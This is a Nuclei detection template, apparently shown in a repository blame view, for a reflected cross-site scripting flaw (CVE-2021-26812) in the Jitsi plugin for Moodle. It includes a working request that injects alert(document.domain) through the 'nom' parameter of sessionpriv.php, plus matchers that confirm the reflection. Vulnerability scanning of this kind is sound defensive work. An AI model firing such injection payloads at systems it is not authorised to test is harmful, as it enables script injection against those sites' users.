nuclei-templates/cves/2021/CVE-2021-26812.yaml

37 lines
1.2 KiB
YAML
Raw Normal View History

2021-07-19 18:40:30 +00:00
id: CVE-2021-26812
2021-03-11 19:38:56 +00:00
2021-03-06 18:25:44 +00:00
info:
2021-03-11 19:36:37 +00:00
name: Moodle jitsi plugin XSS
2021-03-06 18:25:44 +00:00
author: aceseven (digisec360)
2021-07-19 18:42:01 +00:00
description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application.
2021-03-11 19:36:37 +00:00
severity: medium
2021-07-19 18:40:30 +00:00
tags: cve,cve2021,moodle,jitsi,xss
reference:
- https://github.com/udima-university/moodle-mod_jitsi/issues/67
- https://nvd.nist.gov/vuln/detail/CVE-2021-26812
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-26812
cwe-id: CWE-79
2021-03-06 18:25:44 +00:00
requests:
2021-03-11 19:36:37 +00:00
- method: GET
path:
2021-04-10 07:40:29 +00:00
- "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
2021-03-07 08:13:48 +00:00
2021-03-11 19:36:37 +00:00
matchers-condition: and
2021-03-06 18:25:44 +00:00
matchers:
2021-03-07 08:18:33 +00:00
- type: word
2021-03-11 19:36:37 +00:00
part: body
words:
- "alert(document.domain);"
- type: status
status:
- 200
- type: word
part: header
2021-03-07 08:58:07 +00:00
words:
2021-07-19 18:40:30 +00:00
- "MoodleSession"